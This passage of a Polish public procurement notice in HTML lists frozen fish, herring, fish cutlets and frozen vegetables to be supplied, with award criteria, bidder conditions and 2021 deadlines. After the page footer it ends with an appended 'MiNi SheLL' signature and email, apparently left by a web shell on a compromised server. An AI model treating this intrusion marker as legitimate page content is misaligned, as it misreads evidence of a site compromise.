<h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Wybór oferty zostanie dokonany na podstawie niżej przedstawionych kryteriów:L.p.Nazwa kryteriumWaga kryterium1.Cena brutto70%2.Termin reklamacji towaru30%Oferty oceniane będą punktowo. Maksymalną liczbę punktów jaką po uwzględnieniu wagi wszystkich kryteriów może osiągnąć oferta wynosi 100 pkt = 100% <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Tusza rybna mrożonaOpis: tusze rybne mrożone w blokach Opakowanie: zapakowane w kartony, opakowania 25-50 kgCechy wykluczające: niepożądane wady, uszkodzenia tuszy, obcy zapach.Data ważności: termin przydatności do spożycia co najmniej 4-6 miesięcy od dnia dostawy.Ilość:500 kg15220000-6 2.Płaty śledzioweOpis: filety śledziowe soloneCechy wykluczające: niepożądany zapach, Opakowanie: pakowane w wiaderka pcv od 2.5 do 5 kgData ważności: termin przydatności do spożycia 1 miesięcy od dnia dostawy.Ilość:250 kg15220000-6 3.Kotlet rybny mrożonyOpis: produkt gotowy do podgrzania skład z zawartością mięsa ryby minimum 40%.Opakowanie: pakowane w pudełka kartonowe waga 6 kgData ważności: termin przydatności do spożycia 2 miesięcy od dnia dostawy.Ilość: 1500 kg15220000-6 4.Marchew mrożona kostkaOpakowanie: pakowana w opakowania foliowe szczelnie zamknięta waga od 2.5. do 5 kgIlość:230015331170-95.Mieszanka warzywna mrożonaOpakowanie: pakowana w opakowania foliowe szczelnie zamknięta waga od 2.5. do 5 kgIlość:2 30015331170-9 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 43732,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty zostanie dokonany na podstawie niżej przedstawionych kryteriów:L.p.Nazwa kryteriumWaga kryterium1.Cena brutto70%2.Termin reklamacji towaru30%Oferty oceniane będą punktowo. Maksymalną liczbę punktów jaką po uwzględnieniu wagi wszystkich kryteriów może osiągnąć oferta wynosi 100 pkt = 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin reklamacji towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Wybór oferty zostanie dokonany na podstawie niżej przedstawionych kryteriów:L.p.Nazwa kryteriumWaga kryterium1.Cena brutto70%2.Termin reklamacji towaru30%Oferty oceniane będą punktowo. Maksymalną liczbę punktów jaką po uwzględnieniu wagi wszystkich kryteriów może osiągnąć oferta wynosi 100 pkt = 100% <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.1. Warunki udziału w postępowaniu:1) posiadają zdolność do występowania w obrocie gospodarczym;2) posiadają uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;3) znajdują się w sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia;4) posiadają zdolność techniczną lub zawodową do należytego wykonania zamówienia.Zamawiający uzna ww. warunki za spełnione na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 3 do SWZ.2. Ocena spełnienia warunków udziału w postępowaniu o zamówienie publiczne przeprowadzona będzie w oparciu o złożone przez wykonawców oświadczenia zgodnie z formułą „spełnia – nie spełnia”. 3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W trakcie obowiązywania umowy strony dopuszczają zmiany cen w przypadku zmiany stawki podatku VAT, przy czym zmianie ulega wyłącznie cena brutto, cena netto pozostaje bez zmian.2. Nowa stawka podatku VAT obowiązuje od dnia wejścia przepisów ją wprowadzających.3. Ceny poszczególnych artykułów wymienione w § 1 ust. 1 zostaną automatycznie zmienione i dostosowane do obowiązujących przepisów. Zamawiający zapłaci Wykonawcy cenę netto powiększoną o należny podatek VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-04-06 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-04-06 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com